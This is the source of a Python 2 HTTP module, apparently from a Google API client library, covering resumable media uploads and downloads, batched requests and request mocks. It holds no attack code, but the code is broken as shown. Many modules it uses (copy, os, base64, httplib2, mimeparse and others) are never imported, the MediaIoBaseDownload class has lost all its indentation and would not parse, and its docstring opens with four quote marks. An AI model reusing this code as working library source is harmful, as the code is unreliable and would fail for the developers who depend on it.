import urllib
import urlparse
import uuid
from email.generator import Generator
from email.mime.multipart import MIMEMultipart
from email.mime.nonmultipart import MIMENonMultipart
from email.parser import FeedParser
from errors import BatchError
from errors import HttpError
from errors import ResumableUploadError
from errors import UnexpectedBodyError
from errors import UnexpectedMethodError
from model import JsonModel
from oauth2client.anyjson import simplejson
DEFAULT_CHUNK_SIZE = 512*1024
class MediaUploadProgress(object):
  """Status of a resumable upload."""

  def __init__(self, resumable_progress, total_size):
    """Constructor.

    Args:
      resumable_progress: int, bytes sent so far.
      total_size: int, total bytes in complete upload, or None if the total
        upload size isn't known ahead of time.
    """
    self.resumable_progress = resumable_progress
    self.total_size = total_size

  def progress(self):
    """Percent of upload completed, as a float.

    Returns:
      the percentage complete as a float, returning 0.0 if the total size of
      the upload is unknown.
    """
    # Without a known total there is no meaningful fraction to report.
    if self.total_size is None:
      return 0.0
    return float(self.resumable_progress) / float(self.total_size)
class MediaDownloadProgress(object):
  """Status of a resumable download."""

  def __init__(self, resumable_progress, total_size):
    """Constructor.

    Args:
      resumable_progress: int, bytes received so far.
      total_size: int, total bytes in complete download.
    """
    self.resumable_progress = resumable_progress
    self.total_size = total_size

  def progress(self):
    """Percent of download completed, as a float.

    Returns:
      the percentage complete as a float, returning 0.0 if the total size of
      the download is unknown.
    """
    # Without a known total there is no meaningful fraction to report.
    if self.total_size is None:
      return 0.0
    return float(self.resumable_progress) / float(self.total_size)
class MediaUpload(object):
  """Describes a media object to upload.

  Base class that defines the interface of MediaUpload subclasses.

  Note that subclasses of MediaUpload may allow you to control the chunksize
  when uploading a media object. It is important to keep the size of the chunk
  as large as possible to keep the upload efficient. Other factors may
  influence the size of the chunk you use, particularly if you are working in
  an environment where individual HTTP requests may have a hardcoded time
  limit, such as under certain classes of requests under Google App Engine.
  """

  def chunksize(self):
    """Chunk size for resumable uploads.

    Returns:
      Chunk size in bytes.
    """
    raise NotImplementedError()

  def mimetype(self):
    """Mime type of the body.

    Returns:
      Mime type.
    """
    return 'application/octet-stream'

  def size(self):
    """Size of upload.

    Returns:
      Size of the body, or None if the size is unknown.
    """
    return None

  def resumable(self):
    """Whether this upload is resumable.

    Returns:
      True if resumable upload or False.
    """
    return False

  # BUG FIX: the second parameter was named 'end' even though the docstring
  # and every subclass implementation treat it as a byte count named 'length'.
  def getbytes(self, begin, length):
    """Get bytes from the media.

    Args:
      begin: int, offset from beginning of file.
      length: int, number of bytes to read, starting at begin.

    Returns:
      A string of bytes read. May be shorter than length if EOF was reached
      first.
    """
    raise NotImplementedError()

  def _to_json(self, strip=None):
    """Utility function for creating a JSON representation of a MediaUpload.

    Args:
      strip: array, An array of names of members to not include in the JSON.

    Returns:
      string, a JSON representation of this instance, suitable to pass to
        from_json().
    """
    t = type(self)
    d = copy.copy(self.__dict__)
    if strip is not None:
      for member in strip:
        del d[member]
    # Record the concrete class so new_from_json() can rebuild the right type.
    d['_class'] = t.__name__
    d['_module'] = t.__module__
    return simplejson.dumps(d)

  def to_json(self):
    """Create a JSON representation of an instance of MediaUpload.

    Returns:
      string, a JSON representation of this instance, suitable to pass to
        from_json().
    """
    return self._to_json()

  @classmethod
  def new_from_json(cls, s):
    """Utility class method to instantiate a MediaUpload subclass from a JSON
    representation produced by to_json().

    Args:
      s: string, JSON from to_json().

    Returns:
      An instance of the subclass of MediaUpload that was serialized with
      to_json().
    """
    data = simplejson.loads(s)
    # Find and call the right classmethod from_json() to restore the object.
    module = data['_module']
    m = __import__(module, fromlist=module.split('.')[:-1])
    kls = getattr(m, data['_class'])
    from_json = getattr(kls, 'from_json')
    return from_json(s)
class MediaFileUpload(MediaUpload):
  """A MediaUpload for a file.

  Construct a MediaFileUpload and pass as the media_body parameter of the
  method. For example, if we had a service that allowed uploading images:

    media = MediaFileUpload('cow.png', mimetype='image/png',
      chunksize=1024*1024, resumable=True)
    farm.animals().insert(
        id='cow',
        name='cow.png',
        media_body=media).execute()
  """

  def __init__(self, filename, mimetype=None, chunksize=DEFAULT_CHUNK_SIZE, resumable=False):
    """Constructor.

    Args:
      filename: string, Name of the file.
      mimetype: string, Mime-type of the file. If None then a mime-type will be
        guessed from the file extension.
      chunksize: int, File will be uploaded in chunks of this many bytes. Only
        used if resumable=True.
      resumable: bool, True if this is a resumable upload. False means upload
        in a single request.
    """
    self._filename = filename
    self._size = os.path.getsize(filename)
    # The file is opened lazily in getbytes() so that a deserialized
    # instance (see from_json) does not hold a file handle until needed.
    self._fd = None
    if mimetype is None:
      (mimetype, encoding) = mimetypes.guess_type(filename)
    self._mimetype = mimetype
    self._chunksize = chunksize
    self._resumable = resumable

  def chunksize(self):
    """Chunk size for resumable uploads.

    Returns:
      Chunk size in bytes.
    """
    return self._chunksize

  def mimetype(self):
    """Mime type of the body.

    Returns:
      Mime type.
    """
    return self._mimetype

  def size(self):
    """Size of upload.

    Returns:
      Size of the body, or None if the size is unknown.
    """
    return self._size

  def resumable(self):
    """Whether this upload is resumable.

    Returns:
      True if resumable upload or False.
    """
    return self._resumable

  def getbytes(self, begin, length):
    """Get bytes from the media.

    Args:
      begin: int, offset from beginning of file.
      length: int, number of bytes to read, starting at begin.

    Returns:
      A string of bytes read. May be shorter than length if EOF was reached
      first.
    """
    if self._fd is None:
      self._fd = open(self._filename, 'rb')
    self._fd.seek(begin)
    return self._fd.read(length)

  def to_json(self):
    """Creating a JSON representation of an instance of MediaFileUpload.

    Returns:
      string, a JSON representation of this instance, suitable to pass to
        from_json().
    """
    # The open file handle cannot be serialized; it is reopened on demand.
    return self._to_json(['_fd'])

  @staticmethod
  def from_json(s):
    """Restore a MediaFileUpload serialized by to_json()."""
    d = simplejson.loads(s)
    return MediaFileUpload(
        d['_filename'], d['_mimetype'], d['_chunksize'], d['_resumable'])
class MediaIoBaseUpload(MediaUpload):
  """A MediaUpload for a io.Base objects.

  Note that the Python file object is compatible with io.Base and can be used
  with this class also.

    fh = io.BytesIO('...Some data to upload...')
    media = MediaIoBaseUpload(fh, mimetype='image/png',
      chunksize=1024*1024, resumable=True)
    farm.animals().insert(
        id='cow',
        name='cow.png',
        media_body=media).execute()
  """

  def __init__(self, fd, mimetype, chunksize=DEFAULT_CHUNK_SIZE,
               resumable=False):
    """Constructor.

    Args:
      fd: io.Base or file object, The source of the bytes to upload. MUST be
        opened in blocking mode, do not use streams opened in non-blocking mode.
      mimetype: string, Mime-type of the stream. Unlike MediaFileUpload there
        is no filename to guess a type from, so a mime-type must be supplied.
      chunksize: int, File will be uploaded in chunks of this many bytes. Only
        used if resumable=True.
      resumable: bool, True if this is a resumable upload. False means upload
        in a single request.
    """
    self._fd = fd
    self._mimetype = mimetype
    self._chunksize = chunksize
    self._resumable = resumable
    self._size = None
    try:
      if hasattr(self._fd, 'fileno'):
        fileno = self._fd.fileno()

        # Pipes and such show up as 0 length files.
        size = os.fstat(fileno).st_size
        if size:
          # Reuse the stat result rather than calling os.fstat() twice.
          self._size = size
    except IOError:
      # Streams without a real file descriptor (e.g. in-memory buffers)
      # simply report an unknown size.
      pass

  def chunksize(self):
    """Chunk size for resumable uploads.

    Returns:
      Chunk size in bytes.
    """
    return self._chunksize

  def mimetype(self):
    """Mime type of the body.

    Returns:
      Mime type.
    """
    return self._mimetype

  def size(self):
    """Size of upload.

    Returns:
      Size of the body, or None if the size is unknown.
    """
    return self._size

  def resumable(self):
    """Whether this upload is resumable.

    Returns:
      True if resumable upload or False.
    """
    return self._resumable

  def getbytes(self, begin, length):
    """Get bytes from the media.

    Args:
      begin: int, offset from beginning of file.
      length: int, number of bytes to read, starting at begin.

    Returns:
      A string of bytes read. May be shorter than length if EOF was reached
      first.
    """
    self._fd.seek(begin)
    return self._fd.read(length)

  def to_json(self):
    """This upload type is not serializable."""
    raise NotImplementedError('MediaIoBaseUpload is not serializable.')
class MediaInMemoryUpload(MediaUpload):
  """MediaUpload for a chunk of bytes.

  Construct a MediaInMemoryUpload and pass as the media_body parameter of the
  method.
  """

  def __init__(self, body, mimetype='application/octet-stream',
               chunksize=DEFAULT_CHUNK_SIZE, resumable=False):
    """Create a new MediaInMemoryUpload.

    Args:
      body: string, Bytes of body content.
      mimetype: string, Mime-type of the file or default of
        'application/octet-stream'.
      chunksize: int, File will be uploaded in chunks of this many bytes. Only
        used if resumable=True.
      resumable: bool, True if this is a resumable upload. False means upload
        in a single request.
    """
    self._body = body
    self._mimetype = mimetype
    self._resumable = resumable
    self._chunksize = chunksize

  def chunksize(self):
    """Chunk size for resumable uploads.

    Returns:
      Chunk size in bytes.
    """
    return self._chunksize

  def mimetype(self):
    """Mime type of the body.

    Returns:
      Mime type.
    """
    return self._mimetype

  def size(self):
    """Size of upload.

    Returns:
      Size of the body, or None if the size is unknown.
    """
    return len(self._body)

  def resumable(self):
    """Whether this upload is resumable.

    Returns:
      True if resumable upload or False.
    """
    return self._resumable

  def getbytes(self, begin, length):
    """Get bytes from the media.

    Args:
      begin: int, offset from beginning of file.
      length: int, number of bytes to read, starting at begin.

    Returns:
      A string of bytes read. May be shorter than length if EOF was reached
      first.
    """
    return self._body[begin:begin + length]

  def to_json(self):
    """Create a JSON representation of a MediaInMemoryUpload.

    Returns:
      string, a JSON representation of this instance, suitable to pass to
        from_json().
    """
    t = type(self)
    d = copy.copy(self.__dict__)
    del d['_body']
    d['_class'] = t.__name__
    d['_module'] = t.__module__
    # The body may be arbitrary binary data, so base64-encode it to make it
    # safe to embed in a JSON string.
    d['_b64body'] = base64.b64encode(self._body)
    return simplejson.dumps(d)

  @staticmethod
  def from_json(s):
    """Restore a MediaInMemoryUpload serialized by to_json()."""
    d = simplejson.loads(s)
    return MediaInMemoryUpload(base64.b64decode(d['_b64body']),
                               d['_mimetype'], d['_chunksize'],
                               d['_resumable'])
class MediaIoBaseDownload(object):
""""Download media resources.
Note that the Python file object is compatible with io.Base and can be used
with this class also.
Example:
request = farms.animals().get_media(id='cow')
fh = io.FileIO('cow.png', mode='wb')
downloader = MediaIoBaseDownload(fh, request, chunksize=1024*1024)
done = False
while done is False:
status, done = downloader.next_chunk()
if status:
print "Download %d%%." % int(status.progress() * 100)
print "Download Complete!"
"""
def __init__(self, fd, request, chunksize=DEFAULT_CHUNK_SIZE):
"""Constructor.
Args:
fd: io.Base or file object, The stream in which to write the downloaded
bytes.
request: apiclient.http.HttpRequest, the media request to perform in
chunks.
chunksize: int, File will be downloaded in chunks of this many bytes.
"""
self._fd = fd
self._request = request
self._uri = request.uri
self._chunksize = chunksize
self._progress = 0
self._total_size = None
self._done = False
def next_chunk(self):
"""Get the next chunk of the download.
Returns:
(status, done): (MediaDownloadStatus, boolean)
The value of 'done' will be True when the media has been fully
downloaded.
Raises:
apiclient.errors.HttpError if the response was not a 2xx.
httplib2.HttpLib2Error if a transport error has occured.
"""
headers = {
'range': 'bytes=%d-%d' % (
self._progress, self._progress + self._chunksize)
}
http = self._request.http
http.follow_redirects = False
resp, content = http.request(self._uri, headers=headers)
if resp.status in [301, 302, 303, 307, 308] and 'location' in resp:
self._uri = resp['location']
resp, content = http.request(self._uri, headers=headers)
if resp.status in [200, 206]:
self._progress += len(content)
self._fd.write(content)
if 'content-range' in resp:
content_range = resp['content-range']
length = content_range.rsplit('/', 1)[1]
self._total_size = int(length)
if self._progress == self._total_size:
self._done = True
return MediaDownloadProgress(self._progress, self._total_size), self._done
else:
raise HttpError(resp, content, self._uri)
class HttpRequest(object):
  """Encapsulates a single HTTP request."""

  def __init__(self, http, postproc, uri,
               method='GET',
               body=None,
               headers=None,
               methodId=None,
               resumable=None):
    """Constructor for an HttpRequest.

    Args:
      http: httplib2.Http, the transport object to use to make a request
      postproc: callable, called on the HTTP response and content to transform
                it into a data object before returning, or raising an exception
                on an error.
      uri: string, the absolute URI to send the request to
      method: string, the HTTP method to use
      body: string, the request body of the HTTP request,
      headers: dict, the HTTP request headers
      methodId: string, a unique identifier for the API method being called.
      resumable: MediaUpload, None if this is not a resumable request.
    """
    self.uri = uri
    self.method = method
    self.body = body
    self.headers = headers or {}
    self.methodId = methodId
    self.http = http
    self.postproc = postproc
    self.resumable = resumable
    self._in_error_state = False

    # Pull the multipart boundary out of the content-type header.
    # BUG FIX: read from self.headers (which defaults to {}) rather than the
    # raw headers argument, which is None when the caller omits it and would
    # raise AttributeError on .get().
    major, minor, params = mimeparse.parse_mime_type(
        self.headers.get('content-type', 'application/json'))

    # The size of the non-media part of the request.
    self.body_size = len(self.body or '')

    # The resumable URI to send chunks to.
    self.resumable_uri = None

    # The bytes that have been uploaded.
    self.resumable_progress = 0

  def execute(self, http=None):
    """Execute the request.

    Args:
      http: httplib2.Http, an http object to be used in place of the
            one the HttpRequest request object was constructed with.

    Returns:
      A deserialized object model of the response body as determined
      by the postproc.

    Raises:
      apiclient.errors.HttpError if the response was not a 2xx.
      httplib2.HttpLib2Error if a transport error has occured.
    """
    if http is None:
      http = self.http
    if self.resumable:
      body = None
      while body is None:
        # Drive the resumable upload to completion one chunk at a time.
        _, body = self.next_chunk(http)
      return body
    else:
      if 'content-length' not in self.headers:
        self.headers['content-length'] = str(self.body_size)
      resp, content = http.request(self.uri, self.method,
                                   body=self.body,
                                   headers=self.headers)
      if resp.status >= 300:
        raise HttpError(resp, content, self.uri)
    return self.postproc(resp, content)

  def next_chunk(self, http=None):
    """Execute the next step of a resumable upload.

    Can only be used if the method being executed supports media uploads and
    the MediaUpload object passed in was flagged as using resumable upload.

    Example:

      media = MediaFileUpload('cow.png', mimetype='image/png',
                              chunksize=1000, resumable=True)
      request = farm.animals().insert(
          id='cow',
          name='cow.png',
          media_body=media)

      response = None
      while response is None:
        status, response = request.next_chunk()
        if status:
          print "Upload %d%% complete." % int(status.progress() * 100)

    Returns:
      (status, body): (ResumableMediaStatus, object)
         The body will be None until the resumable media is fully uploaded.

    Raises:
      apiclient.errors.HttpError if the response was not a 2xx.
      httplib2.HttpLib2Error if a transport error has occured.
    """
    if http is None:
      http = self.http

    # '*' tells the server the total size is not yet known.
    if self.resumable.size() is None:
      size = '*'
    else:
      size = str(self.resumable.size())

    if self.resumable_uri is None:
      # First request: start the resumable session and record the session URI.
      start_headers = copy.copy(self.headers)
      start_headers['X-Upload-Content-Type'] = self.resumable.mimetype()
      if size != '*':
        start_headers['X-Upload-Content-Length'] = size
      start_headers['content-length'] = str(self.body_size)

      resp, content = http.request(self.uri, self.method,
                                   body=self.body,
                                   headers=start_headers)
      if resp.status == 200 and 'location' in resp:
        self.resumable_uri = resp['location']
      else:
        raise ResumableUploadError("Failed to retrieve starting URI.")
    elif self._in_error_state:
      # If we are in an error state then query the server for current state of
      # the upload by sending an empty PUT and reading the 'range' header in
      # the response.
      headers = {
          'Content-Range': 'bytes */%s' % size,
          'content-length': '0'
          }
      resp, content = http.request(self.resumable_uri, 'PUT',
                                   headers=headers)
      status, body = self._process_response(resp, content)
      if body:
        # The upload was complete.
        return (status, body)

    data = self.resumable.getbytes(
        self.resumable_progress, self.resumable.chunksize())

    # A short read implies that we are at EOF, so finish the upload.
    if len(data) < self.resumable.chunksize():
      size = str(self.resumable_progress + len(data))

    headers = {
        'Content-Range': 'bytes %d-%d/%s' % (
            self.resumable_progress, self.resumable_progress + len(data) - 1,
            size)
        }
    try:
      resp, content = http.request(self.resumable_uri, 'PUT',
                                   body=data,
                                   headers=headers)
    except:
      # Deliberately bare: any failure (including interrupts) must flag the
      # error state before re-raising, so the next call re-queries progress.
      self._in_error_state = True
      raise

    return self._process_response(resp, content)

  def _process_response(self, resp, content):
    """Process the response from a single chunk upload.

    Args:
      resp: httplib2.Response, the response object.
      content: string, the content of the response.

    Returns:
      (status, body): (ResumableMediaStatus, object)
         The body will be None until the resumable media is fully uploaded.

    Raises:
      apiclient.errors.HttpError if the response was not a 2xx or a 308.
    """
    if resp.status in [200, 201]:
      self._in_error_state = False
      return None, self.postproc(resp, content)
    elif resp.status == 308:
      self._in_error_state = False
      # A "308 Resume Incomplete" indicates we are not done.
      self.resumable_progress = int(resp['range'].split('-')[1]) + 1
      if 'location' in resp:
        self.resumable_uri = resp['location']
    else:
      self._in_error_state = True
      raise HttpError(resp, content, self.uri)

    return (MediaUploadProgress(self.resumable_progress, self.resumable.size()),
            None)

  def to_json(self):
    """Returns a JSON representation of the HttpRequest."""
    d = copy.copy(self.__dict__)
    if d['resumable'] is not None:
      d['resumable'] = self.resumable.to_json()
    # The transport and postproc callables are not serializable; they are
    # supplied again by the caller of from_json().
    del d['http']
    del d['postproc']
    return simplejson.dumps(d)

  @staticmethod
  def from_json(s, http, postproc):
    """Returns an HttpRequest populated with info from a JSON object."""
    d = simplejson.loads(s)
    if d['resumable'] is not None:
      d['resumable'] = MediaUpload.new_from_json(d['resumable'])
    return HttpRequest(
        http,
        postproc,
        uri=d['uri'],
        method=d['method'],
        body=d['body'],
        headers=d['headers'],
        methodId=d['methodId'],
        resumable=d['resumable'])
class BatchHttpRequest(object):
  """Batches multiple HttpRequest objects into a single HTTP request.

  Example:
    from apiclient.http import BatchHttpRequest

    def list_animals(request_id, response, exception):
      \"\"\"Do something with the animals list response.\"\"\"
      if exception is not None:
        # Do something with the exception.
        pass
      else:
        # Do something with the response.
        pass

    def list_farmers(request_id, response, exception):
      \"\"\"Do something with the farmers list response.\"\"\"
      if exception is not None:
        # Do something with the exception.
        pass
      else:
        # Do something with the response.
        pass

    service = build('farm', 'v2')

    batch = BatchHttpRequest()

    batch.add(service.animals().list(), list_animals)
    batch.add(service.farmers().list(), list_farmers)
    batch.execute(http)
  """

  def __init__(self, callback=None, batch_uri=None):
    """Constructor for a BatchHttpRequest.

    Args:
      callback: callable, A callback to be called for each response, of the
        form callback(id, response, exception). The first parameter is the
        request id, and the second is the deserialized response object. The
        third is an apiclient.errors.HttpError exception object if an HTTP error
        occurred while processing the request, or None if no error occurred.
      batch_uri: string, URI to send batch requests to.
    """
    if batch_uri is None:
      batch_uri = 'https://www.googleapis.com/batch'
    self._batch_uri = batch_uri

    # Global callback to be called for each individual response in the batch.
    self._callback = callback

    # A map from id to request.
    self._requests = {}

    # A map from id to callback.
    self._callbacks = {}

    # List of request ids, in the order in which they were added.
    self._order = []

    # The last auto generated id.
    self._last_auto_id = 0

    # Unique ID on which to base the Content-ID headers.
    self._base_id = None

    # A map from request id to (httplib2.Response, content) response pairs
    self._responses = {}

    # A map of id(Credentials) that have been refreshed.
    self._refreshed_credentials = {}

  def _refresh_and_apply_credentials(self, request, http):
    """Refresh the credentials and apply to the request.

    Args:
      request: HttpRequest, the request.
      http: httplib2.Http, the global http object for the batch.
    """
    # For the credentials to refresh, but only once per refresh_token
    # If there is no http per the request then refresh the http passed in
    # via execute()
    creds = None
    if request.http is not None and hasattr(request.http.request,
        'credentials'):
      creds = request.http.request.credentials
    elif http is not None and hasattr(http.request, 'credentials'):
      creds = http.request.credentials
    if creds is not None:
      # Refresh each distinct credentials object at most once per batch;
      # identity (id()) is used as the dedup key.
      if id(creds) not in self._refreshed_credentials:
        creds.refresh(http)
        self._refreshed_credentials[id(creds)] = 1

      # Only apply the credentials if we are using the http object passed in,
      # otherwise apply() will get called during _serialize_request().
      if request.http is None or not hasattr(request.http.request,
          'credentials'):
        creds.apply(request.headers)

  def _id_to_header(self, id_):
    """Convert an id to a Content-ID header value.

    Args:
      id_: string, identifier of individual request.

    Returns:
      A Content-ID header with the id_ encoded into it. A UUID is prepended to
      the value because Content-ID headers are supposed to be universally
      unique.
    """
    if self._base_id is None:
      self._base_id = uuid.uuid4()

    return '<%s+%s>' % (self._base_id, urllib.quote(id_))

  def _header_to_id(self, header):
    """Convert a Content-ID header value to an id.

    Presumes the Content-ID header conforms to the format that
    _id_to_header() returns.

    Args:
      header: string, Content-ID header value.

    Returns:
      The extracted id value.

    Raises:
      BatchError if the header is not in the expected format.
    """
    if header[0] != '<' or header[-1] != '>':
      raise BatchError("Invalid value for Content-ID: %s" % header)
    if '+' not in header:
      raise BatchError("Invalid value for Content-ID: %s" % header)
    # Split from the right so '+' characters inside the UUID/base are safe.
    base, id_ = header[1:-1].rsplit('+', 1)

    return urllib.unquote(id_)

  def _serialize_request(self, request):
    """Convert an HttpRequest object into a string.

    Args:
      request: HttpRequest, the request to serialize.

    Returns:
      The request as a string in application/http format.
    """
    # Construct status line
    parsed = urlparse.urlparse(request.uri)
    # Rebuild a relative request URI (path + params + query, no scheme/host).
    request_line = urlparse.urlunparse(
        (None, None, parsed.path, parsed.params, parsed.query, None)
        )
    status_line = request.method + ' ' + request_line + ' HTTP/1.1\n'
    major, minor = request.headers.get('content-type', 'application/json').split('/')
    msg = MIMENonMultipart(major, minor)
    headers = request.headers.copy()

    if request.http is not None and hasattr(request.http.request,
        'credentials'):
      request.http.request.credentials.apply(headers)

    # MIMENonMultipart adds its own Content-Type header.
    if 'content-type' in headers:
      del headers['content-type']

    for key, value in headers.iteritems():
      msg[key] = value
    msg['Host'] = parsed.netloc
    msg.set_unixfrom(None)

    if request.body is not None:
      msg.set_payload(request.body)
      msg['content-length'] = str(len(request.body))

    # Serialize the mime message.
    fp = StringIO.StringIO()
    # maxheaderlen=0 means don't line wrap headers.
    g = Generator(fp, maxheaderlen=0)
    g.flatten(msg, unixfrom=False)
    body = fp.getvalue()

    # Strip off the \n\n that the MIME lib tacks onto the end of the payload.
    if request.body is None:
      body = body[:-2]

    return status_line.encode('utf-8') + body

  def _deserialize_response(self, payload):
    """Convert string into httplib2 response and content.

    Args:
      payload: string, headers and body as a string.

    Returns:
      A pair (resp, content), such as would be returned from httplib2.request.
    """
    # Strip off the status line
    status_line, payload = payload.split('\n', 1)
    protocol, status, reason = status_line.split(' ', 2)

    # Parse the rest of the response
    parser = FeedParser()
    parser.feed(payload)
    msg = parser.close()
    msg['status'] = status

    # Create httplib2.Response from the parsed headers.
    resp = httplib2.Response(msg)
    resp.reason = reason
    # e.g. 'HTTP/1.1' -> 11
    resp.version = int(protocol.split('/', 1)[1].replace('.', ''))

    content = payload.split('\r\n\r\n', 1)[1]

    return resp, content

  def _new_id(self):
    """Create a new id.

    Auto incrementing number that avoids conflicts with ids already used.

    Returns:
      string, a new unique id.
    """
    self._last_auto_id += 1
    # Skip over any ids the caller already supplied explicitly.
    while str(self._last_auto_id) in self._requests:
      self._last_auto_id += 1

    return str(self._last_auto_id)

  def add(self, request, callback=None, request_id=None):
    """Add a new request.

    Every callback added will be paired with a unique id, the request_id.
    That unique id will be passed back to the callback when the response
    comes back from the server. The default behavior is to have the library
    generate its own unique id. If the caller passes in a request_id then
    they must ensure uniqueness for each request_id, and if they are not
    unique an exception is raised. Callers should either supply all
    request_ids or never supply a request id, to avoid such an error.

    Args:
      request: HttpRequest, Request to add to the batch.
      callback: callable, A callback to be called for this response, of the
        form callback(id, response, exception). The first parameter is the
        request id, and the second is the deserialized response object. The
        third is an apiclient.errors.HttpError exception object if an HTTP error
        occurred while processing the request, or None if no errors occurred.
      request_id: string, A unique id for the request. The id will be passed to
        the callback with the response.

    Returns:
      None

    Raises:
      BatchError if a media request is added to a batch.
      KeyError is the request_id is not unique.
    """
    if request_id is None:
      request_id = self._new_id()
    if request.resumable is not None:
      raise BatchError("Media requests cannot be used in a batch request.")
    if request_id in self._requests:
      raise KeyError("A request with this ID already exists: %s" % request_id)
    self._requests[request_id] = request
    self._callbacks[request_id] = callback
    self._order.append(request_id)

  def _execute(self, http, order, requests):
    """Serialize batch request, send to server, process response.

    Args:
      http: httplib2.Http, an http object to be used to make the request with.
      order: list, list of request ids in the order they were added to the
        batch.
      requests: dict, map of request id to HttpRequest objects to send.

    Raises:
      httplib2.HttpLib2Error if a transport error has occured.
      apiclient.errors.BatchError if the response is the wrong format.
    """
    message = MIMEMultipart('mixed')
    # Message should not write out it's own headers.
    setattr(message, '_write_headers', lambda self: None)

    # Add all the individual requests.
    for request_id in order:
      request = requests[request_id]

      msg = MIMENonMultipart('application', 'http')
      msg['Content-Transfer-Encoding'] = 'binary'
      msg['Content-ID'] = self._id_to_header(request_id)

      body = self._serialize_request(request)
      msg.set_payload(body)
      message.attach(msg)

    body = message.as_string()

    headers = {}
    headers['content-type'] = ('multipart/mixed; '
                               'boundary="%s"') % message.get_boundary()

    resp, content = http.request(self._batch_uri, 'POST', body=body,
                                 headers=headers)

    if resp.status >= 300:
      raise HttpError(resp, content, self._batch_uri)

    # Now break out the individual responses and store each one.
    boundary, _ = content.split(None, 1)

    # Prepend with a content-type header so FeedParser can handle it.
    header = 'content-type: %s\r\n\r\n' % resp['content-type']
    for_parser = header + content

    parser = FeedParser()
    parser.feed(for_parser)
    mime_response = parser.close()

    if not mime_response.is_multipart():
      raise BatchError("Response not in multipart/mixed format.", resp,
          content)

    # Each MIME part of the multipart response holds one serialized
    # (response, content) pair, keyed by its Content-ID header.
    for part in mime_response.get_payload():
      request_id = self._header_to_id(part['Content-ID'])
      response, content = self._deserialize_response(part.get_payload())
      self._responses[request_id] = (response, content)

  def execute(self, http=None):
    """Execute all the requests as a single batched HTTP request.

    Args:
      http: httplib2.Http, an http object to be used in place of the one the
        HttpRequest request object was constructed with. If one isn't supplied
        then use a http object from the requests in this batch.

    Returns:
      None

    Raises:
      httplib2.HttpLib2Error if a transport error has occured.
      apiclient.errors.BatchError if the response is the wrong format.
    """
    # If http is not supplied use the first valid one given in the requests.
    if http is None:
      for request_id in self._order:
        request = self._requests[request_id]
        if request is not None:
          http = request.http
          break

    if http is None:
      raise ValueError("Missing a valid http object.")

    self._execute(http, self._order, self._requests)

    # Loop over all the requests and check for 401s. For each 401 request the
    # credentials should be refreshed and then sent again in a separate batch.
    redo_requests = {}
    redo_order = []

    for request_id in self._order:
      resp, content = self._responses[request_id]
      if resp['status'] == '401':
        redo_order.append(request_id)
        request = self._requests[request_id]
        self._refresh_and_apply_credentials(request, http)
        redo_requests[request_id] = request

    if redo_requests:
      # Re-send only the 401'd requests; their entries in self._responses
      # are overwritten by this second _execute() pass.
      self._execute(http, redo_order, redo_requests)

    # Now process all callbacks that are erroring, and raise an exception for
    # ones that return a non-2xx response? Or add extra parameter to callback
    # that contains an HttpError?
    for request_id in self._order:
      resp, content = self._responses[request_id]

      request = self._requests[request_id]
      callback = self._callbacks[request_id]

      response = None
      exception = None
      try:
        if resp.status >= 300:
          raise HttpError(resp, content, request.uri)
        response = request.postproc(resp, content)
      except HttpError, e:
        exception = e

      # Per-request callback first, then the batch-wide callback.
      if callback is not None:
        callback(request_id, response, exception)
      if self._callback is not None:
        self._callback(request_id, response, exception)
class HttpRequestMock(object):
  """Mock of HttpRequest.

  Do not construct directly, instead use RequestMockBuilder.
  """

  def __init__(self, resp, content, postproc):
    """Constructor for HttpRequestMock

    Args:
      resp: httplib2.Response, the response to emulate coming from the request
      content: string, the response body
      postproc: callable, the post processing function usually supplied by
                the model class. See model.JsonModel.response() as an example.
    """
    # Default to a plain 200 OK response when none was supplied.
    if resp is None:
      resp = httplib2.Response({'status': 200, 'reason': 'OK'})
    self.resp = resp
    self.content = content
    self.postproc = postproc
    # Mirror the mapped 'reason' value onto the attribute httplib2 exposes.
    if 'reason' in self.resp:
      self.resp.reason = self.resp['reason']

  def execute(self, http=None):
    """Execute the request.

    Same behavior as HttpRequest.execute(), but the response is
    mocked and not really from an HTTP request/response.
    """
    return self.postproc(self.resp, self.content)
class RequestMockBuilder(object):
  """A simple mock of HttpRequest

  Pass in a dictionary to the constructor that maps request methodIds to
  tuples of (httplib2.Response, content, opt_expected_body) that should be
  returned when that method is called. None may also be passed in for the
  httplib2.Response, in which case a 200 OK response will be generated.
  If an opt_expected_body (str or dict) is provided, it will be compared to
  the body and UnexpectedBodyError will be raised on inequality.

  Example:
    response = '{"data": {"id": "tag:google.c...'
    requestBuilder = RequestMockBuilder(
      {
        'plus.activities.get': (None, response),
      }
    )
    apiclient.discovery.build("plus", "v1", requestBuilder=requestBuilder)

  Methods that you do not supply a response for will return a
  200 OK with an empty string as the response content or raise an excpetion
  if check_unexpected is set to True. The methodId is taken from the rpcName
  in the discovery document.

  For more details see the project wiki.
  """

  def __init__(self, responses, check_unexpected=False):
    """Constructor for RequestMockBuilder

    The constructed object should be a callable object
    that can replace the class HttpResponse.

    responses - A dictionary that maps methodIds into tuples
                of (httplib2.Response, content). The methodId
                comes from the 'rpcName' field in the discovery
                document.
    check_unexpected - A boolean setting whether or not UnexpectedMethodError
                       should be raised on unsupplied method.
    """
    self.responses = responses
    self.check_unexpected = check_unexpected

  def __call__(self, http, postproc, uri, method='GET', body=None,
               headers=None, methodId=None, resumable=None):
    """Implements the callable interface that discovery.build() expects
    of requestBuilder, which is to build an object compatible with
    HttpRequest.execute(). See that method for the description of the
    parameters and the expected response.
    """
    # No canned response registered for this method.
    if methodId not in self.responses:
      if self.check_unexpected:
        raise UnexpectedMethodError(methodId)
      model = JsonModel(False)
      return HttpRequestMock(None, '{}', model.response)

    canned = self.responses[methodId]
    resp, content = canned[:2]
    if len(canned) > 2:
      # Test the body against the supplied expected_body.
      expected_body = canned[2]
      if bool(expected_body) != bool(body):
        # Not expecting a body and provided one
        # or expecting a body and not provided one.
        raise UnexpectedBodyError(expected_body, body)
      if isinstance(expected_body, str):
        expected_body = simplejson.loads(expected_body)
        body = simplejson.loads(body)
      if body != expected_body:
        raise UnexpectedBodyError(expected_body, body)
    return HttpRequestMock(resp, content, postproc)
class HttpMock(object):
    """Mock of httplib2.Http that serves one canned response from a file."""

    def __init__(self, filename, headers=None):
        """
        Args:
            filename: string, absolute filename to read response from
            headers: dict, header to return with response
                (defaults to {'status': '200 OK'})
        """
        if headers is None:
            headers = {'status': '200 OK'}
        # Fix: use open() instead of the Python-2-only builtin file();
        # the context manager also guarantees the handle is closed even
        # if read() raises.
        with open(filename, 'r') as f:
            self.data = f.read()
        self.headers = headers

    def request(self, uri,
                method='GET',
                body=None,
                headers=None,
                redirections=1,
